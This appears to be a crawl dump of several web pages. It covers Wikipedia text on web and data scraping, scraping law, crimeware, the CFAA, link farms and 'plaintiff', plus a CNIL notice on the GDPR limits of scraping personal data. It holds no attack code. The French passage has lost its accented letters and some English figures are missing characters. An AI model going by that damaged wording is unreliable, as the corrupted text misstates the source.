programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
308 | https://en.wikipedia.org/wiki/Web_scraping | https://www.cnil.fr/fr/la-reutilisation-des-donnees-publiquement-accessibles-en-ligne-des-fins-de-demarchage-commercial | En 2019, la CNIL a r alis plusieurs contr les aupr s de soci t s r cup rant les donn es d’internautes publiquement accessibles sur Internet afin de v rifier la conformit des pratiques la loi Informatique et Libert s et au RGPD. La CNIL re oit r guli rement des plaintes concernant les pratiques de soci t s r cup rant des donn es personnelles sur des sites web afin d’effectuer de la prospection commerciale. Elles visent par exemple des soci t s collectant des coordonn es t l phoniques de personnes figurant sur des annonces diffus es sur un site web entre particuliers ou encore des annuaires en ligne. Ces informations sont ensuite utilis es pour de la prospection alors m me que ces personnes ont indiqu s’opposer au d marchage commercial. Ces soci t s sont, par exemple : Ces entreprises ont recours des outils, comme des logiciels d’extractions (ou web scraping en anglais), permettant de collecter automatiquement les coordonn es d’internautes dans les espaces publics de l’Internet. Ces donn es, bien que publiquement accessibles, sont des donn es personnelles. D s lors, elles ne sont pas librement r utilisables par tout responsable de traitement et ne peuvent tre r exploit es l’insu de la personne concern e. Or, les contr les men s en 2019 r v lent plusieurs manquements la l gislation sur la protection des donn es : Afin de respecter les droits des personnes, la CNIL rappelle aux responsables de traitements ainsi qu’ leurs prestataires les bonnes pratiques adopter. Lorsque les personnes qui ont diffus leurs donn es aupr s d’un premier responsable de traitement ne s’attendent pas raisonnablement faire l’objet, par exemple, de prospection commerciale par une autre soci t , la r utilisation des donn es par cette autre soci t des fins commerciales n’est possible qu’avec leur consentement. Exemple : un particulier qui d pose une annonce sur un site de ventes entre particuliers ne s’attend raisonnablement pas tre prospect par un professionnel. Ses donn es ne peuvent donc tre trait es sans son consentement. De m me, lorsque la soci t r utilise des donn es publiquement accessibles sur l’Internet afin d’effectuer de la prospection directe concernant ses produits et services par message lectronique ou automate d’appels, elle doit imp rativement recueillir le consentement des personnes avant ces actions. Il est n cessaire de s’assurer du caract re libre, sp cifique, clair et univoque du consentement. ce titre, l’acceptation par un internaute, de mani re g n rale et indiff renci e, des conditions d’utilisation (CGU) d’un service ne peut tre assimil e un consentement sp cifique, m me si ces conditions d’utilisation informeraient l’internaute de son engagement recevoir de la prospection commerciale par voie lectronique. Lorsque la soci t d marche commercialement les personnes par un autre moyen (par exemple par d marchage t l phonique sans automate d’appel), les logiciels doivent permettre de ne pas collecter les donn es des personnes inscrites sur des listes anti-prospection aupr s d’un op rateur t l phonique ou aupr s du dispositif BLOCTEL. En tout tat de cause, la soci t utilisant ces logiciels ne doit pas d marcher les personnes s’ tant d j oppos es la r ception par cette derni re de sollicitations commerciales. Les soci t s ayant recours ces logiciels doivent s’assurer de la nature et de l’origine des donn es collect es. En effet, certains logiciels extraient ces informations partir de sites web dont les conditions g n rales d’utilisation (CGU) interdisent l’aspiration et la r utilisation des donn es des fins commerciales. Dans cette hypoth se, cette pratique n’est donc pas autoris e. Comme pour tout traitement de donn es personnelles, la collecte de donn es des fins de d marchage t l phonique doit tre r duite ce qui est strictement n cessaire. Les soci t s utilisant ces logiciels doivent en particulier se montrer vigilantes pour viter la collecte d’informations non pertinentes ou excessives, notamment si elles sont sensibles (par exemple des informations sur la sant , la religion ou l’orientation sexuelle des personnes). Pour respecter l’ quilibre entre les int r ts des soci t s ayant recours ces logiciels et les int r ts des personnes concern es, il est primordial que la soci t utilisant le logiciel d’aspiration de donn es fournisse, au plus tard au moment de la premi re communication avec les personnes dont les donn es sont trait es, les informations pr vues l’article 14 du RGPD et notamment celle relative la source des donn es. L’information doit tre concise, compr hensible et ais ment accessible aux personnes concern es. Lorsqu’une soci t a recours aux services d’un prestataire qui utilise le logiciel pour son compte, la soci t doit s’assurer que les mesures pr c demment indiqu es sont prises en compte. De plus, lorsque le prestataire agit en qualit de sous-traitant au sens du RGPD, les contrats entre les parties doivent respecter l’article 28 du RGPD en d finissant, notamment : Le guide du sous-traitant publi par la CNIL d taille les obligations du sous-traitant et propose notamment un exemple de clauses contractuelles. Dans certaines situations, une analyse d’impact relative la protection des donn es (AIPD) est obligatoire avant la mise en uvre du traitement. Par ailleurs, m me si une telle analyse d’impact n’est pas obligatoire, il s’agit d’une bonne pratique adopter pour s’assurer que le traitement de donn es envisag est respectueux du RGPD. La CNIL restera vigilante sur cette pr occupation du quotidien des Fran ais et concernant le respect de leurs droits. |
309 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=info | This page is a member of 6 hidden categories (help): Pages transcluded onto the current version of this page (help): |
310 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-7 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
311 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Crimeware | Crimeware is a class of malware designed specifically to automate cybercrime. 1 Crimeware (as distinct from spyware and adware) is designed to perpetrate identity theft through social engineering or technical stealth in order to access a computer user's financial and retail accounts for the purpose of taking funds from those accounts or completing unauthorized transactions on behalf of the cyberthief. citation needed Alternatively, crimeware may steal confidential or sensitive corporate information. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer valuable, confidential information. The cybercrime landscape has shifted from individuals developing their own tools to a market where crimeware, tools and services for illegal online activities, can be easily acquired in online marketplaces. These crimeware markets are expected to expand, especially targeting mobile devices. 2 The term crimeware was coined by David Jevans in February 2005 in an Anti-Phishing Working Group response to the FDIC article "Putting an End to Account-Hijacking Identity Theft". 3 Criminals use a variety of techniques to steal confidential data through crimeware, including through the following methods: Crimeware threats can be installed on victims' computers through multiple delivery vectors, including: Crimeware can have a significant economic impact due to loss of sensitive and proprietary information and associated financial losses. One survey estimates that in 2005 organizations lost in excess of $30 million due to the theft of proprietary information. 9 The theft of financial or confidential information from corporate networks often places the organizations in violation of government and industry-imposed regulatory requirements that attempt to ensure that financial, personal and confidential. US laws and regulations include: |
312 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act | The Computer Fraud and Abuse Act of 1986 (CFAA) is a United States cybersecurity bill that was enacted in 1986 as an amendment to existing computer fraud law (18 U.S.C. 1030), which had been included in the Comprehensive Crime Control Act of 1984. 1 Prior to computer-specific criminal laws, computer crimes were prosecuted as mail and wire fraud, but the applying law was often insufficient. 2 The original 1984 bill was enacted in response to concern that computer-related crimes might go unpunished. 3 The House Committee Report to the original computer crime bill characterized the 1983 techno-thriller film WarGames—in which a young teenager (played by Matthew Broderick) from Seattle breaks into a U.S. military supercomputer programmed to predict possible outcomes of nuclear war and unwittingly almost starts World War III—as "a realistic representation of the automatic dialing and access capabilities of the personal computer. 4 The CFAA was written to extend existing tort law to intangible property, while, in theory, limiting federal jurisdiction to cases "with a compelling federal interest—i.e., where computers of the federal government or certain financial institutions are involved or where the crime itself is interstate in nature", but its broad definitions have spilled over into contract law (see "Protected Computer", below). In addition to amending a number of the provisions in the original section 1030, the CFAA also criminalized additional computer-related acts. Provisions addressed the distribution of malicious code and denial-of-service attacks. Congress also included in the CFAA a provision criminalizing trafficking in passwords and similar items. 1 Since then, the Act has been amended a number of times—in 1989, 1994, 1996, in 2001 by the USA PATRIOT Act, 2002, and in 2008 by the Identity Theft Enforcement and Restitution Act. With each amendment of the law, the types of conduct that fell within its reach were extended. In January 2015, President Barack Obama proposed expanding the CFAA and the RICO Act in his Modernizing Law Enforcement Authorities to Combat Cyber Crime proposal. 5 DEF CON organizer and Cloudflare researcher Marc Rogers, Senator Ron Wyden, and Representative Zoe Lofgren stated opposition to this on the grounds it would make many regular Internet activities illegal, and moved further away from what they were trying to accomplish with Aaron's Law. 6 The only computers, in theory, covered by the CFAA are defined as "protected computers". They are defined under section 18 U.S.C. 1030(e)(2) to mean a computer: In practice, any ordinary computer has come under the jurisdiction of the law, including cellphones, due to the interstate nature of most Internet communication. 7 (a) Whoever— The Computer Fraud and Abuse Act is both a criminal law and a statute that creates a private right of action, allowing compensation and injunctive or other equitable relief to anyone harmed by a violation of this law. These provisions have allowed private companies to sue disloyal employees for damages for the misappropriation of confidential information (trade secrets). There have been criminal convictions for CFAA violations in the context of civil law, for breach of contract or terms of service violations. Many common and insignificant online acts, such as password-sharing and copyright infringement, can transform a CFAA misdemeanor into a felony. The punishments are severe, similar to sentences for selling or importing drugs, and may be disproportionate. Prosecutors have used the CFAA to protect private business interests and to intimidate free-culture activists, deterring undesirable, yet legal, conduct. 49 50 One such example regarding the harshness of the law was shown in United States vs. Tyler King, 51 where King refused initial offers by the government for involvement in a conspiracy to "gain unauthorized access" to a computer system for a small company that an ex-girlfriend of King worked for. His role, even while not directly involved, resulted in 6.5 years imprisonment. No financial motive was established. A non-profit was started to advocate against further harshness against others targeted under the broad law. 52 Tim Wu called the CFAA "the worst law in technology". 53 Professor of Law Ric Simmons notes that many provisions of the CFAA merely combine identical language to pre-existing federal laws with "the element of “access ing a protected computer without authorization, or by exceed ing authorized access, 54 meaning that "the CFAA merely provides an additional charge for prosecutors to bring if the defendant used a computer while committing the crime. 55 Professor Joseph Olivenbaum has similarly criticized the CFAA's "computer-specific approach, noting both the risk of redundancy and resultant definitional problems. 56 The CFAA increasingly presents real obstacles to journalists reporting stories important to the public’s interest. 57 As data journalism increasingly becomes “a good way of getting to the truth of things . . . in this post-truth era, as one data journalist told Google, the need for further clarity around the CFAA increases. 57 As per Star Kashman, an expert in cybersecurity law, the CFAA presents some challenges in cases related to Search Engine Hacking (also known as Google Dorking). Although Kashman states that accessing publicly available information is legal under the CFAA, she also notes that in many cases Search Engine Hacking is ultimately prosecuted under the CFAA. Kashman believes prosecuting cases of Google Dorking under the CFAA could render the CFAA void for vagueness by making it illegal to access publicly available information. 58 The government was able to bring such disproportionate charges against Aaron because of the broad scope of the Computer Fraud and Abuse Act (CFAA) and the wire fraud statute. It looks like the government used the vague wording of those laws to claim that violating an online service's user agreement or terms of service is a violation of the CFAA and the wire fraud statute. Using the law in this way could criminalize many everyday activities and allow for outlandishly severe penalties. When our laws need to be modified, Congress has a responsibility to act. A simple way to correct this dangerous legal interpretation is to change the CFAA and the wire fraud statutes to exclude terms of service violations. I will introduce a bill that does exactly that. —Rep. Zoe Lofgren, Jan 15, 2013 59 In the wake of the prosecution and subsequent suicide of Aaron Swartz (who used a script to download scholarly research articles in excess of what JSTOR terms of service allowed), lawmakers proposed amending the Computer Fraud and Abuse Act. Representative Zoe Lofgren drafted a bill that would help "prevent what happened to Aaron from happening to other Internet users". 59 Aaron's Law (H.R. 2454, S. 1196 60 ) would exclude terms of service violations from the 1984 Computer Fraud and Abuse Act and from the wire fraud statute. 61 In addition to Lofgren's efforts, Representatives Darrell Issa and Jared Polis (also on the House Judiciary Committee) raised questions in the immediate aftermath of Swartz's death regarding the government's handling of the case. Polis called the charges "ridiculous and trumped up, referring to Swartz as a "martyr. 62 Issa, chair of the House Oversight Committee, announced an investigation of the Justice Department's prosecution. 62 63 By May 2014, Aaron's Law had stalled in committee. Filmmaker Brian Knappenberger alleges this occurred due to Oracle Corporation's financial interest in maintaining the status quo. 64 Aaron's Law was reintroduced in May 2015 (H.R. 1918, S. 1030 65 ) and again stalled. There has been no further introduction of related bills as of? . 2008 1 |
313 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Link_farm | On the World Wide Web, a link farm is any group of websites that all hyperlink to other sites in the group for the purpose of increasing SEO rankings. 1 In graph theoretic terms, a link farm is a clique. Although some link farms can be created by hand, most are created through automated programs and services. A link farm is a form of spamming the index of a web search engine (sometimes called spamdexing). Other link exchange systems are designed to allow individual websites to selectively exchange links with other relevant websites, and are not considered a form of spamdexing. Search engines require ways to confirm page relevancy. A known method is to examine for one-way links coming directly from relevant websites. The process of building links should not be confused with being listed on link farms, as the latter requires reciprocal return links, which often renders the overall backlink advantage useless. This is due to oscillation, causing confusion over which is the vendor site and which is the promoting site. Link farms were first developed by search engine optimizers (SEOs) in 1999 to take advantage of the Inktomi search engine's dependence upon link popularity. Although link popularity is used by some search engines to help establish a ranking order for search results, the Inktomi engine at the time maintained two indexes. Search results were produced from the primary index, which was limited to approximately 100 million listings. Pages with few inbound links fell out of the Inktomi index on a monthly basis. Inktomi was targeted for manipulation through link farms because it was then used by several independent but popular search engines. Yahoo , then the most popular search service, also used Inktomi results to supplement its directory search feature. The link farms helped stabilize listings, primarily for online business Websites that had few natural links from larger, more stable sites in the Inktomi index. Link farm exchanges were at first handled on an informal basis, but several service companies were founded to provide automated registration, categorization, and link page updates to member Websites. When the Google search engine became popular, search engine optimizers learned that Google's ranking algorithm depended in part on a link-weighting scheme called PageRank. Rather than simply count all inbound links equally, the PageRank algorithm determines that some links may be more valuable than others, and therefore assigns them more weight than others. Link farming was adapted to help increase the PageRank of member pages. 2 3 However, the link farms became susceptible to manipulation by unscrupulous webmasters who joined the services, received inbound linkage, and then found ways to hide their outbound links or to avoid posting any links on their sites at all. Link farm managers had to implement quality controls and monitor member compliance with their rules to ensure fairness. Alternative link farm products emerged, particularly link-finding software that identified potential reciprocal link partners, sent them template-based emails offering to exchange links, and created directory-like link pages for Websites, in the hope of building their link popularity and PageRank. These link farms are sometimes considered a spamdexing strategy. Search engines countered the link farm movement by identifying specific attributes associated with link farm pages and filtering those pages from indexing and search results. In some cases, entire domains were removed from the search engine indexes in order to prevent them from influencing search results. A private blog network (PBN) is a group of blogs that are owned by the same entity. A blog network can either be a group of loosely connected blogs, or a group of blogs that are owned by the same company. The purpose of such a network is usually to promote other sites outside the network and therefore increase the search engine rankings or advertising revenue generated from online advertising on the sites the PBN links to. In September 2014, Google targeted private blog networks (PBNs) with manual action ranking penalties. 4 This served to dissuade search engine optimization and online marketers from using PBNs to increase their online rankings. The "thin content" warnings are closely tied to Panda which focuses on thin content and on-page quality. PBNs have a history of being targeted by Google and therefore may not be the safest option. Since Google is on the search for blog networks, they are not always linked together. In fact, interlinking your blogs could help Google, and a single exposed blog could reveal the whole blog network by looking at the outbound links. A blog network may also refer to a central website, such as WordPress, where a user creates an account and is then able to use their own blog. The created blog forms part of a network because it uses either a subdomain or a subfolder of the main domain, although in all other ways it can be entirely autonomous. This is also known as a hosted blog platform and usually uses the free WordPress Multisite software. Hosted blog networks are also known as Web 2.0 networks, since they became more popular with the rise of the second phase of web development. |
314 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Plaintiff | A plaintiff ( in legal shorthand) is the party who initiates a lawsuit (also known as an action) before a court. By doing so, the plaintiff seeks a legal remedy. If this search is successful, the court will issue judgment in favor of the plaintiff and make the appropriate court order (e.g., an order for damages). "Plaintiff" is the term used in civil cases in most English-speaking jurisdictions, the notable exceptions being England and Wales, where a plaintiff has, since the introduction of the Civil Procedure Rules in 1999, been known as a "claimant" and Scotland, where the party has always been known as the "pursuer". In criminal cases, the prosecutor brings the case against the defendant, but the key complaining party is often called the "complainant". In some jurisdictions, a lawsuit is commenced by filing a summons, claim form or a complaint. These documents are known as pleadings, that set forth the alleged wrongs committed by the defendant or defendants with a demand for relief. In other jurisdictions, the action is commenced by service of legal process by delivery of these documents on the defendant by a process server; they are only filed with the court subsequently with an affidavit from the process server that they had been given to the defendant according to the rules of civil procedure. In most English-speaking jurisdictions, including Hong Kong, Nigeria, Australia (except in federal jurisdiction), Canada and the United States, as well as in both Northern Ireland and the Republic of Ireland, the legal term "plaintiff" is used as a general term for the party taking action in a civil case. The word plaintiff can be traced to the year 1278, and stems from the Anglo-French word pleintif meaning "complaining". It was identical to "plaintive" at first and receded into legal usage with the -iff spelling in the 15th century. 1 A plaintiff identified by name in a class action is called a named plaintiff. In most common-law jurisdictions, the term "claimant" used in England and Wales since 1999 (see below) is used only in specific, often non-judicial contexts. In particular, in American usage, terms such as "claimant" and "claim form" are limited to extrajudicial process in insurance and administrative law. After exhausting remedies available through an insurer or government agency, an American claimant in need of further relief would turn to the courts, file a complaint (thus establishing a real court case under judicial supervision) and become a plaintiff. In England and Wales, the term "claimant" replaced "plaintiff" after the Civil Procedure Rules came into force on 26 April 1999. 2 The move, which brings England and Wales out of line with general usage in English-speaking jurisdictions, was reportedly based on an assessment that the word "claimant" is more acceptable as "plain English" than the word "plaintiff". 3 In Scottish law a plaintiff is referred to as a "pursuer" and a defendant as a "defender". 4 The similar term "complainant" denotes the complaining witness in a criminal proceeding. In the Federal Court of Australia, most plaintiffs are called "applicants", but in admiralty and corporations law matters they are called "plaintiffs". 5 Case names are usually given with the plaintiff first, as in Plaintiff v. Defendant (orally, Plaintiff and Defendant). The party against whom the complaint is made is the defendant; or, in the case of a petition, a respondent. Subsequent references to a case may use only one of the names, typically that of the first nongovernmental party. 6 Criminal cases are usually brought by the 